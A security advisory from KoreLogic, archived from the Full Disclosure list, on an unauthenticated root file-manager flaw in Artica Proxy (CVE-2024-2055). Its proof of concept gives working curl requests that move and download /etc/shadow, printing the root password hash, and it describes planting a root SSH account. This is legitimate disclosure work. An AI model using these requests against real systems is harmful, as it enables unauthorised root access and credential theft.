KL-001-2024-003: Artica Proxy Unauthenticated File Manager Vulnerability

Related Vulnerabilities: CVE-2024-2055  
                							

                <!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="12"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#13">By Date</a>
<a href="14"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="12"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#13">By Thread</a>
<a href="14"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>

</div>

<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">KL-001-2024-003: Artica Proxy Unauthenticated File Manager Vulnerability</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->


<em>From</em>: KoreLogic Disclosures via Fulldisclosure &lt;fulldisclosure () seclists org&gt;


<em>Date</em>: Tue, 5 Mar 2024 12:30:19 -0600


<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">KL-001-2024-003: Artica Proxy Unauthenticated File Manager Vulnerability

Title: Artica Proxy Unauthenticated File Manager Vulnerability
Advisory ID: KL-001-2024-003
Publication Date: 2024.03.05
Publication URL: <a rel="nofollow" href="https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt">https://korelogic.com/Resources/Advisories/KL-001-2024-003.txt</a>


1. Vulnerability Details

&nbsp;&nbsp;&nbsp;&nbsp; Affected Vendor: Artica
&nbsp;&nbsp;&nbsp;&nbsp; Affected Product: Artica Proxy
&nbsp;&nbsp;&nbsp;&nbsp; Affected Version: 4.40 and 4.50
&nbsp;&nbsp;&nbsp;&nbsp; Platform: Debian 10 LTS
&nbsp;&nbsp;&nbsp;&nbsp; CWE Classification: CWE-288: Authentication Bypass Using an
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Alternate Path or Channel, CWE-552: Files
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or Directories Accessible to External
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Parties
&nbsp;&nbsp;&nbsp;&nbsp; CVE ID: CVE-2024-2055


2. Vulnerability Description

&nbsp;&nbsp;&nbsp;&nbsp; The "Rich Filemanager" feature of Artica Proxy provides a
&nbsp;&nbsp;&nbsp;&nbsp; web-based interface for file management capabilities. When
&nbsp;&nbsp;&nbsp;&nbsp; the feature is enabled, it does not require authentication by
&nbsp;&nbsp;&nbsp;&nbsp; default, and runs as the root user.


3. Technical Description

&nbsp;&nbsp;&nbsp;&nbsp; The Artica Proxy can be installed with a small amount of
&nbsp;&nbsp;&nbsp;&nbsp; "Features" enabled. Within the administrative web interface,
&nbsp;&nbsp;&nbsp;&nbsp; additional features can be installed, enabled, and disabled. The
&nbsp;&nbsp;&nbsp;&nbsp; "Rich Filemanager" feature is disabled by default. Enabling
&nbsp;&nbsp;&nbsp;&nbsp; this feature will spawn a listener on port 5000/tcp bound to
&nbsp;&nbsp;&nbsp;&nbsp; 0.0.0.0. By default, when this feature is enabled, authentication
&nbsp;&nbsp;&nbsp;&nbsp; is not required to access the web interface. The "Rich
&nbsp;&nbsp;&nbsp;&nbsp; Filemanager" runs as the root user. This provides an
&nbsp;&nbsp;&nbsp;&nbsp; unauthenticated attacker complete access to the file system.

&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; root@artica:~# ps -efww | grep -i File
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1888&nbsp; 1885&nbsp; 0 09:13 ?&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 00:00:00 php-fpm: pool RICHFILEMANAGER
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1889&nbsp; 1885&nbsp; 0 09:13 ?&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 00:00:00 php-fpm: pool RICHFILEMANAGER

&nbsp;&nbsp;&nbsp;&nbsp; This can be exploited by an attacker to add entries in to
&nbsp;&nbsp;&nbsp;&nbsp; /etc/shadow, /etc/passwd, and /etc/ssh/sshd_config to create
&nbsp;&nbsp;&nbsp;&nbsp; an additional root-level account that has the ability to SSH
&nbsp;&nbsp;&nbsp;&nbsp; in to the system.


4. Mitigation and Remediation Recommendation

&nbsp;&nbsp;&nbsp;&nbsp; No response from vendor. Rich Filemanager feature is disabled
&nbsp;&nbsp;&nbsp;&nbsp; by default. Leave it that way.


5. Credit

&nbsp;&nbsp;&nbsp;&nbsp; This vulnerability was discovered by Jim Becher of KoreLogic,
&nbsp;&nbsp;&nbsp;&nbsp; Inc.


6. Disclosure Timeline

&nbsp;&nbsp;&nbsp;&nbsp; 2023.12.18 - KoreLogic requests vulnerability contact and
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; secure communication method from Artica.
&nbsp;&nbsp;&nbsp;&nbsp; 2023.12.18 - Artica Support issues automated ticket #1703011342
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; promising follow-up from a human.
&nbsp;&nbsp;&nbsp;&nbsp; 2024.01.10 - KoreLogic again requests vulnerability contact and
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; secure communication method from Artica.
&nbsp;&nbsp;&nbsp;&nbsp; 2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mail.articatech.com with response
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; "Client host rejected: Go Away!"
&nbsp;&nbsp;&nbsp;&nbsp; 2024.01.11 - KoreLogic requests vulnerability contact and
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; secure communication method via
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <a rel="nofollow" href="https://www.articatech.com/">https://www.articatech.com/</a> 'Contact Us' web form.
&nbsp;&nbsp;&nbsp;&nbsp; 2024.01.23 - KoreLogic requests CVE from MITRE.
&nbsp;&nbsp;&nbsp;&nbsp; 2024.01.23 - MITRE issues automated ticket #1591692 promising
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; follow-up from a human.
&nbsp;&nbsp;&nbsp;&nbsp; 2024.02.01 - 30 business days have elapsed since KoreLogic
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; attempted to contact the vendor.
&nbsp;&nbsp;&nbsp;&nbsp; 2024.02.06 - KoreLogic requests update on CVE from MITRE.
&nbsp;&nbsp;&nbsp;&nbsp; 2024.02.15 - KoreLogic requests update on CVE from MITRE.
&nbsp;&nbsp;&nbsp;&nbsp; 2024.02.22 - KoreLogic reaches out to alternate CNA for
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; CVE identifiers.
&nbsp;&nbsp;&nbsp;&nbsp; 2024.02.26 - 45 business days have elapsed since KoreLogic
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; attempted to contact the vendor.
&nbsp;&nbsp;&nbsp;&nbsp; 2024.02.29 - Vulnerability details presented to AHA!
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (takeonme.org) by proxy.
&nbsp;&nbsp;&nbsp;&nbsp; 2024.03.01 - AHA! issues CVE-2024-2055 to track this
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; vulnerability.
&nbsp;&nbsp;&nbsp;&nbsp; 2024.03.05 - KoreLogic public disclosure.


7. Proof of Concept

&nbsp;&nbsp;&nbsp;&nbsp; Step 1: Move /etc/shadow to /tmp/shadow
</pre><tt>&nbsp;&nbsp;&nbsp;&nbsp; $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' 
</tt><tt>-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H 
</tt><tt>$'Connection: close' 
</tt><tt>$'<a rel="nofollow" href="http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885542096&amp;mode=move&amp;old=%2Fetc%2Fshadow&amp;new=%2Ftmp%2F&amp;_=1700868631198&amp;apos">http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885542096&amp;mode=move&amp;old=%2Fetc%2Fshadow&amp;new=%2Ftmp%2F&amp;_=1700868631198&amp;apos</a>;
</tt><pre style="margin: 0em;">
</pre><tt>{"data":{"id":"\/tmp\/shadow","type":"file","attributes":{"name":"shadow","path":"\/tmp\/shadow","readable":1,"writable":1,"created":"","modified":"24 
</tt><tt>Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":"2037"}}}
</tt><pre style="margin: 0em;">
&nbsp;&nbsp;&nbsp;&nbsp; Step 2: Download /tmp/shadow
</pre><tt>&nbsp;&nbsp;&nbsp;&nbsp; $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: 
</tt><tt>text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H 
</tt><tt>$'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' -H $'Pragma: no-cache' -H 
</tt><tt>$'Cache-Control: no-cache' 
</tt><tt>$'<a rel="nofollow" href="http://192.168.2.139:5000/connectors/php/filemanager.php?mode=download&amp;path=%2Ftmp%2Fshadow&amp;time=1700885590870&amp;apos">http://192.168.2.139:5000/connectors/php/filemanager.php?mode=download&amp;path=%2Ftmp%2Fshadow&amp;time=1700885590870&amp;apos</a>;
</tt><pre style="margin: 0em;">
root:$6$Pvb1ivrg5oo.a/om$xtRvfpBBSZgPt/fDjHzw9k9e.jxWaY.LPOqnqHJcSBuQMxtjtG6pBBMMf1Z6D4jtN6kDSB3h5FufJ9DuXv.7R0:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; daemon:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; bin:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; sys:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; sync:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; games:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; man:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; lp:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; mail:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; <a rel="nofollow" href="news:*:19507:0:99999:7:::">news:*:19507:0:99999:7:::</a>
&nbsp;&nbsp;&nbsp;&nbsp; uucp:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; proxy:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; www-data:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; backup:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; list:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; irc:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; gnats:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; nobody:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; _apt:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; systemd-timesync:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; systemd-network:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; systemd-resolve:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; messagebus:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; quagga:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; apt-mirror:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; privoxy:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; ntp:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; redsocks:!:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; prads:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; freerad:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; vnstat:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; stunnel4:!:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; sshd:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; vde2-net:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; memcache:!:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; davfs2:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; ziproxy:!:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; proftpd:!:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; ftp:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; mosquitto:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; openldap:!:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; munin:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; msmtp:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; Debian-snmp:!:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; opendkim:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; avahi:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; glances:*:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; ArticaStats:!:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; netdata:!:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; mysql:!:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; postfix:!:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; squid:!:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; smokeping:!:19507:0:99999:7:::
&nbsp;&nbsp;&nbsp;&nbsp; unbound:!:19645:0:99999:7:::

&nbsp;&nbsp;&nbsp;&nbsp; Step 3: Move /tmp/shadow back to /etc/shadow as not to create a DoS condition
</pre><tt>&nbsp;&nbsp;&nbsp;&nbsp; $ curl -s -k -X $'GET' -H $'Host: 192.168.2.139:5000' -H $'Accept: application/json, text/javascript, */*; q=0.01' 
</tt><tt>-H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'X-Requested-With: XMLHttpRequest' -H 
</tt><tt>$'Connection: close' 
</tt><tt>$'<a rel="nofollow" href="http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885798719&amp;mode=move&amp;old=%2Ftmp%2Fshadow&amp;new=%2Fetc%2F&amp;_=1700868631208&amp;apos">http://192.168.2.139:5000/connectors/php/filemanager.php?time=1700885798719&amp;mode=move&amp;old=%2Ftmp%2Fshadow&amp;new=%2Fetc%2F&amp;_=1700868631208&amp;apos</a>;
</tt><pre style="margin: 0em;">
</pre><tt>{"data":{"id":"\/etc\/shadow","type":"file","attributes":{"name":"shadow","path":"\/etc\/shadow","readable":0,"writable":1,"created":"","modified":"24 
</tt><tt>Nov 2023 15:55","timestamp":1700862914,"height":0,"width":0,"size":0}}}
</tt><pre style="margin: 0em;">

The contents of this advisory are copyright(c) 2024
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
<a rel="nofollow" href="http://creativecommons.org/licenses/by-sa/4.0/">http://creativecommons.org/licenses/by-sa/4.0/</a>

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
<a rel="nofollow" href="https://www.korelogic.com/about-korelogic.html">https://www.korelogic.com/about-korelogic.html</a>

Our public vulnerability disclosure policy is available at:
<a rel="nofollow" href="https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt">https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt</a>

</pre><p><strong>Attachment:
<a href="att-13/OpenPGP_signature_asc.bin"><tt>OpenPGP_signature.asc</tt></a></strong>

<em>Description:</em> OpenPGP digital signature</p>
<pre style="margin: 0em;">_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives &amp; RSS: <a rel="nofollow" href="https://seclists.org/fulldisclosure/">https://seclists.org/fulldisclosure/</a></pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="12"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#13">By Date</a>
<a href="14"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="12"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#13">By Thread</a>
<a href="14"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>KL-001-2024-003: Artica Proxy Unauthenticated File Manager Vulnerability</strong> <em>KoreLogic Disclosures via Fulldisclosure (Mar 05)</em>
</li></ul>


<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>